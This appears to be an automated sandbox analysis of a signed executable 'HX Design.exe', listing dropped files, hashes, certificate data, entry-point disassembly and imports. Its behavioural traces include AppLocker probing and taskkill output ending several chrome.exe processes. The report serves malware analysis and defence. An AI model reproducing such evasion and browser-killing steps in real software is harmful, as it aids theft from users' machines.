                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):55
                                                                                                                                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):97
                                                                                                                                                                                                                                                    Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                                                    MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                                                    SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                                                    SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                                                    SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):348
                                                                                                                                                                                                                                                    Entropy (8bit):4.699001156790115
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:BgnCdumaonuHjRbfAnCdumaonDjRbfAnCdumaonNXRbfAnCdumaonsRbfAnCdum0:jdOouDRZdOoXRZdOoNXRZdOosRZdOoO7
                                                                                                                                                                                                                                                    MD5:AC27A65AA29D949B766DDEAEDC5A556E
                                                                                                                                                                                                                                                    SHA1:1356864C83784BDF9F451E0C6C0F3B16283486DE
                                                                                                                                                                                                                                                    SHA-256:49814406166AD0D6865D928BE634883D5C57614133418A2CB115C0A9B12AC8A1
                                                                                                                                                                                                                                                    SHA-512:1A6A92ACB541E170BD2CDEEEB7CED36ECD9DD30B6291BCFC1E56FDA55727DBCA0FFEA3C1F438051423F9B14A1BD3CEA4A20595B93A94ABAAEF7BC1A108C5BC4A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:SUCCESS: The process "chrome.exe" with PID 908 has been terminated...SUCCESS: The process "chrome.exe" with PID 648 has been terminated...SUCCESS: The process "chrome.exe" with PID 2800 has been terminated...SUCCESS: The process "chrome.exe" with PID 7976 has been terminated...SUCCESS: The process "chrome.exe" with PID 7972 has been terminated...
                                                                                                                                                                                                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Entropy (8bit):7.994827864219541
                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                    File name:HX Design.exe
                                                                                                                                                                                                                                                    File size:9'441'536 bytes
                                                                                                                                                                                                                                                    MD5:55933983c78673a3d30c3d7f8bd54b83
                                                                                                                                                                                                                                                    SHA1:d9e701fe9c117fb428a533c219af3fcffbc42f34
                                                                                                                                                                                                                                                    SHA256:9203d748f205c44735ccb43f9312cc818693de205075d8c0d3a3582eca6e2e63
                                                                                                                                                                                                                                                    SHA512:a653744b73ab5332ffe665ed87d5fb2c061b336bd4f92e6adbb0e05ce9fbffb82f9364d7b56239bb7d664ce6830bc5112d76ce91c5321613fe6a5d2ec62b97cd
                                                                                                                                                                                                                                                    SSDEEP:196608:7tJekYKawfI9jUC6i4H1qSiXLGVi7DMjpZYHQK6Me+Okc/iLJ:eQIH6iK1piXLGVE4N2wK6la
                                                                                                                                                                                                                                                    TLSH:6D963302AA8049F6F2F7593CC895800DD0737BA21BA0EBAB075CD2695DB31F58936777
                                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..*\.Z*\.Z*\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z*\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d..
                                                                                                                                                                                                                                                    Icon Hash:03214d65353d2101
                                                                                                                                                                                                                                                    Entrypoint:0x14000cdb0
                                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                    Time Stamp:0x6764D27C [Fri Dec 20 02:12:12 2024 UTC]
                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                                    Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
                                                                                                                                                                                                                                                    Signature Valid:true
                                                                                                                                                                                                                                                    Signature Issuer:CN=SSL.com Code Signing Intermediate CA ECC R2, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                                                                                                                                                                    Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                                    Error Number:0
                                                                                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                                                                                    • 19/12/2024 02:57:07 19/12/2025 02:57:07
                                                                                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                                                                                    • CN=Nguy\u1ec5n V\u0103n Tu\u1ea5n, O=Nguy\u1ec5n V\u0103n Tu\u1ea5n, L=Huy\u1ec7n H\u01b0ng H\xe0, S=Th\xe1i B\xecnh, C=VN
                                                                                                                                                                                                                                                    Version:3
                                                                                                                                                                                                                                                    Thumbprint MD5:9E5BCDCA4C3680A150B89D1F7A41F8FF
                                                                                                                                                                                                                                                    Thumbprint SHA-1:9AE50F22379325CC7A0AEBCD570E8BDD66F16AAD
                                                                                                                                                                                                                                                    Thumbprint SHA-256:A800FDC4C52D8959F924280FF0ECA2B05A7C3F44A62D130922A08B712DC43BB9
                                                                                                                                                                                                                                                    Serial:232FC1EDBB147B0927E13ED8D7F12C47
                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                                                                                                    call 00007F4600FF6B9Ch
                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                                                                                    jmp 00007F4600FF67BFh
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                                                                                                    call 00007F4600FF6F68h
                                                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                                                    je 00007F4600FF6963h
                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                    mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                    mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                                    jmp 00007F4600FF6947h
                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                    cmp ecx, eax
                                                                                                                                                                                                                                                    je 00007F4600FF6956h
                                                                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                    cmpxchg dword ptr [0003577Ch], ecx
                                                                                                                                                                                                                                                    jne 00007F4600FF6930h
                                                                                                                                                                                                                                                    xor al, al
                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                                                    mov al, 01h
                                                                                                                                                                                                                                                    jmp 00007F4600FF6939h
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                                                                                                    test ecx, ecx
                                                                                                                                                                                                                                                    jne 00007F4600FF6949h
                                                                                                                                                                                                                                                    mov byte ptr [00035765h], 00000001h
                                                                                                                                                                                                                                                    call 00007F4600FF6095h
                                                                                                                                                                                                                                                    call 00007F4600FF7380h
                                                                                                                                                                                                                                                    test al, al
                                                                                                                                                                                                                                                    jne 00007F4600FF6946h
                                                                                                                                                                                                                                                    xor al, al
                                                                                                                                                                                                                                                    jmp 00007F4600FF6956h
                                                                                                                                                                                                                                                    call 00007F4601003E9Fh
                                                                                                                                                                                                                                                    test al, al
                                                                                                                                                                                                                                                    jne 00007F4600FF694Bh
                                                                                                                                                                                                                                                    xor ecx, ecx
                                                                                                                                                                                                                                                    call 00007F4600FF7390h
                                                                                                                                                                                                                                                    jmp 00007F4600FF692Ch
                                                                                                                                                                                                                                                    mov al, 01h
                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    inc eax
                                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                    sub esp, 20h
                                                                                                                                                                                                                                                    cmp byte ptr [0003572Ch], 00000000h
                                                                                                                                                                                                                                                    mov ebx, ecx
                                                                                                                                                                                                                                                    jne 00007F4600FF69A9h
                                                                                                                                                                                                                                                    cmp ecx, 01h
                                                                                                                                                                                                                                                    jnbe 00007F4600FF69ACh
                                                                                                                                                                                                                                                    call 00007F4600FF6EDEh
                                                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                                                    je 00007F4600FF696Ah
                                                                                                                                                                                                                                                    test ebx, ebx
                                                                                                                                                                                                                                                    jne 00007F4600FF6966h
                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                    lea ecx, dword ptr [00035716h]
                                                                                                                                                                                                                                                    call 00007F4601003C92h
                                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca5c0x78.rdata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x40e4.rsrc
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2250.pdata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x8ff8680x1898
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4c0000x764.reloc
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                    .text0x10000x29f000x2a0002a7ae207b6295492e9da088072661752False0.5514439174107143data6.487454925709845IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    .rdata0x2b0000x12a500x12c00d6e871de58b2ad747fe259938e55e93eFalse0.5244661458333333data5.752626136336296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .pdata0x440000x22500x2400f5559f14427a02f0a5dbd0dd026cae54False0.470703125data5.291665041994019IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    .rsrc0x470000x40e40x42001b4144fd62193348b8c9f1510a9a7d26False0.8910984848484849data7.721747286097212IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    .reloc0x4c0000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                    RT_ICON0x472200x1cePNG image data, 16 x 16, 8-bit/color RGB, non-interlaced1.0238095238095237
                                                                                                                                                                                                                                                    RT_ICON0x473f00x2daPNG image data, 24 x 24, 8-bit/color RGB, non-interlaced1.015068493150685
                                                                                                                                                                                                                                                    RT_ICON0x476cc0x3f3PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced1.0108803165182987
                                                                                                                                                                                                                                                    RT_ICON0x47ac00x6b3PNG image data, 48 x 48, 8-bit/color RGB, non-interlaced1.0064139941690962
                                                                                                                                                                                                                                                    RT_ICON0x481740x9fcPNG image data, 64 x 64, 8-bit/color RGB, non-interlaced1.004303599374022
                                                                                                                                                                                                                                                    RT_ICON0x48b700x1c6fPNG image data, 128 x 128, 8-bit/color RGB, non-interlaced0.9939552136282457
                                                                                                                                                                                                                                                    RT_GROUP_ICON0x4a7e00x5adata0.8111111111111111
                                                                                                                                                                                                                                                    RT_VERSION0x4a83c0x398OpenPGP Public Key0.45543478260869563
                                                                                                                                                                                                                                                    RT_MANIFEST0x4abd40x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                                    USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                                                    COMCTL32.dll
